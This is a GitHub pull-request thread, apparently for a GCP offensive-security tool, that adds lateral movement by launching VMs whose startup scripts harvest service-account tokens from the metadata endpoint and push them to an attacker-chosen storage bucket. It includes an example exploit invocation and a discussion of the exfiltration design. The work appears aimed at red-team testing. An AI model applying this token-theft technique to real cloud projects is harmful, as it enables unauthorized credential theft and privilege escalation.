Support actAs with VM's in addition to*** GCF#10
Support actAs with VM's in addition to*** GCF#104ndygu wants to merge 10 commits intodxa4481:masterfrom
Conversation
|
Hmmm the bucket seems a little tricky in some cases. Would it make more sense to just have the startup script run a simple python server on port 80 that returns data with a supplied password? |
|
Hmm, I thought about the port 80 situation, but it may be difficult to reach that server without a corresponding firewall rule change. I recognize that default ports may allow ingress on the default network, but it would be difficult to guarantee token access without a corresponding guarantee that the firewall ports are open. Pushing routinely to GCS allows us to take advantage of gcp hosts typically having lax egress requirements, especially when it comes to storage services in GCP, to GCP ips. Although I might be mistaken here -- how do you feel? |
|
What if the data was brokered through the compute metadata? That should be available, and if you could land a startup script you should have permissions to it already. |
|
Oh I guess not all the instances will have permission to the metadata though |
|
Hrm... the only thing with the bucket is there's an action the user has to take to explicitly add the service account to it. Maybe a big message when you run the module "MAKE SURE YOU GIVE |
|
I think that if compute metadata were unavailable, the entire vector is dead in the water :(. That being said, since this vector relies on the creation of new VMs, my assumption is that technically ,we do have it. In any case, this PR edits the flags to ask users to manually supply their own bucket. I'll add a commit to let users know they have to give the SA Access to the bucket :). |
|
A quick note -- I would imagine that if I were a user, I would just make the bucket publically writable but not readable, i.e. giving Storage Object Creator to AllUsers. How do you feel? |
|
[pushed my conception of that up.] |
Because the user has full control over the bucket, they should always be able to add the service account to it, no? No reason to not lock it down, right? |
|
right. I was appealing to the scenario where someone may see a project with a large # of different service accounts, which would in turn have projects with large #s of different service accounts. It may get unwieldy to manage all those credentials first, then load permissions accordingly. The additional risk profile is write-only, not read, so I suppose a malicious user could overwrite existing keys, but not extend access by reading new objects in that GCS bucket. In any case, I abstracted the command with |
|
Hi! I went ahead and also added support for escalation if users have the |
|
Ahh nice. Another question, I notice the bucket currently needs to be hard coded into the source and modified by the user, but this workflow is difficult particularly from folks who want to pull the image from Dockerhub. Can we move this bucket to be configurable by command line argument? |
|
Cool -- I think that currently, the script name replaces the bucketname with I see your point though -- At least in the I'm messing with a way to attach arbitrary python packages to a dataflow job to replicate this script, and i'll take a shot at doing the replace if I'm understanding your message :). |
|
For more clarity -- the function doing the dynamic replace is |
|
Hi @dxa4481! Just wanted to check in on this. I edited the above functionality while working on another lateral feature, and can send that as soon as I figure some stuff out with Dataflow. |
|
Just got around to testing. I was able to use the VM source, but when I go to actually use the SA for commands I'm getting this error when it tries to fetch a credential: Any idea what's causing this? Also unrelated, would you mind removing the pyc file committed? Sorry if responses are a little delayed, I'm in the middle of a move, so things are a little crazy. |
|
No worries, good luck on the move! I'll hit these after work today.
|
|
I did provide the bucket name, and both the base identity and the target identity had project editor on the bucket, all of which lived in the same project I was provisioning the VM. |
|
killed pyc. re: the bucket issue, I just confirmed that I was able to run with the following command: I have a hunch that this might be due to an assumption the In any case, I'll work on seeding the project with a user-supplied name. |
|
I added a configuration to specify the GCS client project. Please lmk if this helps with your issue! |
|
So here's the output of the command after pulling the latest: I do have access to that bucket though as verified by: |
|
hmm, I replicated your setup and have been unable to issue the same behavior. To drill down a little bit more, did you seed your account with Additionally, if you literally run Sorry for the back'nforth! |
|
I have the correct service account activated: and I confirmed I can write to the bucket: I'll do a little more testing later today |
|
Hmm, I still have not been able to get this situation. Can you give me some of your output from |
This PR supports lateral movement for users with Service Account User + Compute User. The tactic here is to mount compute instances with startup scripts that recurrently pull from the token endpoints and push them to a user's chosen GCS bucket. Identities must have access to the bucket. I add the following flags:
actAsMethod -- defaults to cloud function, but can support vm based lateral movement
bucket -- stores startup script information for the service account at hand
I can call with:
python3 main.py --exploit actas --actAsMethod vm --bucket gcploit_eater --project speedy-cab-288518 --target allThe PR also includes some name changes to support extensibility. Please let me know if other solutions work better!
There are a few wishlist items:
--impersonate-service-account.